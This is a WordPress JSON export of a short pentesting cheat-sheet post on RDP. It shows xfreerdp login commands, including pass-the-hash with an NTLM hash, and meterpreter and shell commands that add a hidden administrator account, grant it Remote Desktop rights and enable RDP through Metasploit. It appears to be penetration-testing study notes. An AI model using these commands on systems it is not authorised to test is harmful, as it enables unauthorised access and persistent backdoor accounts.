{"id":1592,"date":"2020-06-18T10:54:17","date_gmt":"2020-06-18T08:54:17","guid":{"rendered":"https:\/\/andreas-klingler.de\/infosec\/?p=1592"},"modified":"2024-09-09T12:44:42","modified_gmt":"2024-09-09T10:44:42","slug":"rdp","status":"publish","type":"post","link":"https:\/\/infosec.andreas-klingler.de\/?p=1592","title":{"rendered":"<span class=\"caps\">RDP<\/span> Remote Desktop Protocol"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">Use rdesk\u00adtop for a nor\u00admal&nbsp;login<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">rdesktop $target<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Nor\u00admal login for a local&nbsp;user<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">xfreerdp \/cert-ignore \/u:user \/p:pass \/v:$target<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Login for a domain user<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">xfreerdp \/cert-ignore \/u:user \/d:dom.com \/p:pass \/v:1$target<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">To log in with a <span class=\"caps\">NTML<\/span> hash, use xfreerdp.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">xfreerdp \/u:Peter \/pth:666fb5b812a486f87062670c3baf1852 \/v:$target<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Acti\u00advate<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">net localgroup \"Remote Desktop Users\" Administrator \/add<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Create a new admin and enable <span class=\"caps\">RDP<\/span><\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Open a meter\u00adpreter shell.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Note: Depend\u00ading of the sys\u00adtem lan\u00adguage, the group may not be called \u201cadmin\u00adis\u00adtra\u00adtors\u201d. Check the name of the admin\u00adis\u00adtra\u00adtor group with <strong>net local\u00adgroup<\/strong> first.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">meterpreter &gt; execute -f \"net user \/add uuu xHQvZRbB%X8F\" -i\nmeterpreter &gt; execute -f \"net localgroup <em>administrators<\/em> uuu \/add\" -i\nmeterpreter &gt; execute -f \"net localgroup \\\"Remote Desktop Users\\\" uuu \/add\" -i<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Or direct\u00adly in a&nbsp;shell:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">net user \/add uuu xHQvZRbB%X8F\nnet localgroup <em>administrators<\/em> uuu \/add\nnet localgroup \"Remote Desktop Users\" uuu \/add<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">(Don\u2019t use some\u00adthing like 12345678 as pass\u00adword, because this could be silent\u00adly reject\u00aded due to the pass\u00adword policies.)<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Activating <span class=\"caps\">RDP<\/span><\/h2>\n\n\n\n<ol class=\"wp-block-list\">\n<li>Open a ses\u00adsion in Metasploit<\/li>\n\n\n\n<li>Exe\u00adcute <code>msf&gt; use post\/windows\/manage\/enable_rdp<\/code><\/li>\n<\/ol>\n","protected":false},"excerpt":{"rendered":"<p>Use rdesk\u00adtop for a nor\u00admal&nbsp;login rdesk\u00adtop $tar\u00adget Nor\u00admal login for a local&nbsp;user xfreerdp \/cert-ignore \/u:user \/p:pass \/v:$target Login for a domain user xfreerdp \/cert-ignore \/u:user \/d:dom.com \/p:pass \/v:1$target To log in with a <span class=\"caps\">NTML<\/span> hash, use xfreerdp. xfreerdp \/u:Peter \/pth:666fb5b812a486f87062670c3baf1852 \/v:$target Acti\u00advate net local\u00adgroup \u201cRemote Desk\u00adtop Users\u201d Admin\u00adis\u00adtra\u00adtor \/add Cre\u00adate a new admin and enable&nbsp;[\u2026]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"wp_typography_post_enhancements_disabled":false,"footnotes":""},"categories":[323],"tags":[147],"class_list":["post-1592","post","type-post","status-publish","format-standard","hentry","category-protocol","tag-rdp"],"_links":{"self":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/1592","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1592"}],"version-history":[{"count":6,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/1592\/revisions"}],"predecessor-version":[{"id":4358,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/1592\/revisions\/4358"}],"wp:attachment":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1592"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1592"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1592"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}